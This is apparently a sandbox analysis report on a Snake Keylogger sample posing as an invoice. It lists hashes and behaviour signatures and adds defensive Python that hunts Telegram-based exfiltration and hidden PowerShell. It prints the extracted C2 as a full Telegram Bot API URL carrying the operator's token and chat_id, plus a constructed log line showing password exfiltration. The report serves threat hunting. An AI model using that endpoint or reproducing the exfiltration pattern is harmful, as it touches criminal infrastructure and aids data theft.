General

  • Target

    CMS AGE Invoice 8 March 2025 sign.exe

  • Size

    1.0MB

  • Sample

    250414-hcexjssvas

  • MD5

    70b411c7aa1753649f16bf40ff715e15

  • SHA1

    25164d02b05a3d22a63e47ab09fd8f5c96650a8c

  • SHA256

    4723dee89c57a6cd8008358779826bfb0a6385f40dd852ad1bbba3e5e6d6758c

  • SHA512

    722116926312bb80a85eda1af64876dff2802f4d29e3a2d5b1f7366076c8d0d8137cb4bdb29282b95a731a3b160ba0fec3ecc701cd802e3758c592b253086851

  • SSDEEP

    24576:QG8tBFBiemT0AxlhvMh85j+nJuhUwY+s6iA4GuaJjt8c:TeHixKyjIJuJ26Idc

Malware Config

Extracted

Family

snakekeylogger

C2

https://api.telegram.org/bot7694680589:AAH7v3RVHta216sxEJEjKVfvPtJtbLd9qY0/sendMessage?chat_id=7987531671

Targets

    • Target

      CMS AGE Invoice 8 March 2025 sign.exe

    • Snake Keylogger

      Keylogger and infostealer first seen in November 2020.

    • Snake Keylogger payload

    • Snakekeylogger family

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with the display window hidden.

    • Accesses Microsoft Outlook profiles

    • Blocklisted process makes network request

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of NtCreateThreadExHideFromDebugger

    • Suspicious use of NtSetInformationThreadHideFromDebugger
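
The extracted Telegram C2 URL and the hidden-window PowerShell signature above translate directly into hunting logic. What follows is an added example, not code from the original report, from Snake Keylogger, or from the sandbox vendor: it splits the Bot API URL from the config into bot ID, token, method and chat_id, flags Telegram Bot API requests in proxy logs, and checks process command lines for PowerShell launched with a hidden window. The proxy log format, the log lines, the second bot token and the command lines are constructed test data and assumptions, not observations from this sample.

```python
"""Hunting logic derived from the extracted Snake Keylogger config.

Added example; not part of the sandbox report and not the malware's own code.
The C2 URL is the value extracted on this page. The proxy log lines, the
second bot token and the PowerShell command lines are constructed test data.
"""
import re
from urllib.parse import urlsplit, parse_qs

# C2 value extracted by the sandbox (taken from the report above).
C2_URL = ("https://api.telegram.org/bot7694680589:AAH7v3RVHta216sxEJEjKVfvPtJtbLd9qY0"
          "/sendMessage?chat_id=7987531671")

# Telegram Bot API path shape: /bot<bot_id>:<secret>/<method>
_BOT_PATH = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>\w+)$")


def parse_telegram_c2(url):
    """Split a Telegram Bot API URL into the fields worth pivoting on.

    Returns None when the URL is not a Telegram Bot API call.
    """
    parts = urlsplit(url)
    if parts.scheme != "https" or parts.hostname != "api.telegram.org":
        return None
    m = _BOT_PATH.match(parts.path)
    if not m:
        return None
    qs = parse_qs(parts.query)
    return {
        "bot_id": m.group("bot_id"),
        "token": f"{m.group('bot_id')}:{m.group('secret')}",
        "method": m.group("method"),
        "chat_id": qs.get("chat_id", [None])[0],
    }


# Constructed proxy log (assumed format: "<timestamp> <src_ip> <method> <url> <status>").
# The third line uses a made-up bot token to show a hit that is not this sample's C2.
SAMPLE_PROXY_LOG = """\
2025-04-14T08:12:01Z 10.0.0.21 GET https://www.microsoft.com/ 200
2025-04-14T08:12:09Z 10.0.0.21 GET https://api.telegram.org/bot7694680589:AAH7v3RVHta216sxEJEjKVfvPtJtbLd9qY0/sendMessage?chat_id=7987531671&text=Passwords 200
2025-04-14T08:13:44Z 10.0.0.33 POST https://api.telegram.org/bot123456789:AAEconstructedTokenForOtherBot/sendDocument 200
2025-04-14T08:14:02Z 10.0.0.21 GET https://example.org/ 200
"""


def find_telegram_exfil(log_text, known_bot_ids=()):
    """Return (src_ip, bot_id, method, matches_known_c2) for every Bot API request.

    Any Bot API call from an endpoint deserves a look; a bot_id that appears in
    an extracted config confirms this sample's infrastructure.
    """
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        src_ip, url = fields[1], fields[3]
        info = parse_telegram_c2(url)
        if info is None:
            continue
        hits.append((src_ip, info["bot_id"], info["method"], info["bot_id"] in known_bot_ids))
    return hits


# Constructed process-creation command lines (not from the sample).
SAMPLE_CMDLINES = [
    'powershell.exe -NoProfile -WindowStyle Hidden -Command "Start-Sleep 5"',
    'powershell.exe -w hidden -ep bypass -c "Get-Date"',
    'powershell.exe -Command Get-Process',
]

# powershell.exe accepts unambiguous parameter prefixes (-w, -win) and both - and /.
_HIDDEN = re.compile(r"(?i)(?:-|/)(?:w|win|windowstyle)\s+hidden")


def powershell_hidden_window(cmdline):
    """True when the command line launches PowerShell with its window hidden."""
    tokens = cmdline.split()
    if not tokens:
        return False
    exe = tokens[0].strip('"').lower()   # assumes the image path carries no spaces
    if not (exe.endswith(("powershell.exe", "pwsh.exe")) or exe in ("powershell", "pwsh")):
        return False
    return _HIDDEN.search(cmdline) is not None


if __name__ == "__main__":
    print(parse_telegram_c2(C2_URL))
    for hit in find_telegram_exfil(SAMPLE_PROXY_LOG, known_bot_ids={"7694680589"}):
        print(hit)
    for cmd in SAMPLE_CMDLINES:
        print(powershell_hidden_window(cmd), cmd)
```

The numeric half of the token is the bot's own user ID and survives a token rotation, so it is the field to pivot on across samples; the secret half and the chat_id are what the operator can swap cheaply. Endpoints with no business reason to reach api.telegram.org can simply have it blocked at the proxy.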

MITRE ATT&CK Enterprise v16

Tasks